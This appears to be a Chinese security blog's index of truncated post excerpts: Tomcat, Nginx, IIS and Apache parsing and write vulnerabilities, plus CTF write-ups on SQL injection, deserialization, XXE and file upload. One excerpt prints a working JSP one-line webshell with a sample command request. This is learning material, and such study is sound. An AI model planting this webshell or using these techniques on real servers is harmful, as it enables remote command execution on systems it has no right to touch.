Tomcat 中间件漏洞

配置文件错误造成的任意写漏洞 (CVE-2017-12615) Tomcat版本:8.5.19 当web.xml中配置了readonly=false时,可以用PUT方法往服务器写文件 试试 发现确实被写入了 直接写木马就ge...

JSP一句话木马

挖洞遇见些JSP站,JSP一句话木马还是得会吧 <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> 无回显命令执行 http://127.0.0.1/shell.jsp?cmd=calc <%    if("023".equals(request.g...

[GYCTF2020]Ezsqli

知识点:information_schema.tables变形。无列名比较注入 fuzz一下 发现可用^异或,可以进行盲注 因为information_schema被过滤了,我们要获得表名可以用 sys.schema_table_statistics_w...

bestphp’s revenge

知识点:session反序列化, 反序列化时对原生类SoapClient的利用 ,CRLF 参考文章 https://www.anquanke.com/post/id/153065#h2-1 这道题考的蛮多的 进来后是这样 同时目录下还有一个flag.ph...

[NCTF2019]True XML cookbook

知识点:xxe 内网渗透 进来后是这样,这好像是那个啥xxelabs的登录框,而且结合题目名不难想到是xxe随便输点东西进去 发现数据是以xml形式传输而且<username>还有回显,xxe一波 xxe实锤...

Nginx中间件漏洞

‘/’字符解析漏洞(和iis7/7.5漏洞利用方法一致) url/xxx.gif/xx.php会被解析为php文件 前提条件:cgi.fix_pathinfo=1 目录遍历小洞 前提条件: nginx-conf 把这个选项改为on即可 目录穿越...

iis中间件漏洞

关于/的php解析漏洞(iis7/7.5解析漏洞) 适用版本 iis7/7.5 前提条件: 1.php.ini里的cgi.fix_pathinfo设置为1,且结合方式是fast-cgi 2.开启Fast-CGI运行模式 作用: 在访问某个文件时,在路径后加 /*....

Apache httpd中间件漏洞

apache文件多后缀名解析漏洞 与其说这是一个漏洞,不如说这是一个特性,很多程序员不知道这种特性,所以会写出有问题的代码。 特性:多后缀名(全版本都有这个特性) apache在解析一个文件的后缀名时,是从...

[RoarCTF 2019]Simple Upload

知识点:thinkphp控制器路由,目录爆破,文件上传 进来后是这样,根据thinkphp控制器路由规则,文件上传点在 index.php/home/index/upload 可以看到这里让你上传的name=file的文件后缀不能为php ...

[RoarCTF 2019]Online Proxy

知识点:sql盲注 XFF注入 知识点很简单,就是从xff头进行sql注入.只是这个模型没见过:xff输入一个sql注入payload后提交后,然后再发包换一个xff头过去,会显示last ip:... ,然后再发一个xff一样的包,若sql注...